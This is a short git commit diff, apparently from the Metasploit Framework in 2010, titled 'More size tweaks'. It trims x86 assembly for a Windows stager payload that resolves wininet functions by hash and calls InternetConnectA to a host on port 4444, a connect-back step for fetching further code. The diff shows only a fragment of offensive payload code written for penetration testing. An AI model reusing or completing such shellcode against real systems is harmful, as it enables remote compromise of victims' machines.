More size tweaks

git-svn-id: file:///home/svn/framework3/trunk@8999 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2010-04-03 08:03:28 +00:00
parent c8defe9716
commit e968c3894e
2 changed files with 26 additions and 28 deletions
@@ -26,7 +26,6 @@ internetopen:
push esi ; LPCTSTR lpszAgent
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
mov esi, eax ; save the HINTERNET handle
jmp dbl_get_server_host
@@ -40,7 +39,7 @@ internetconnect:
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
push esi ; HINTERNET hInternet
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp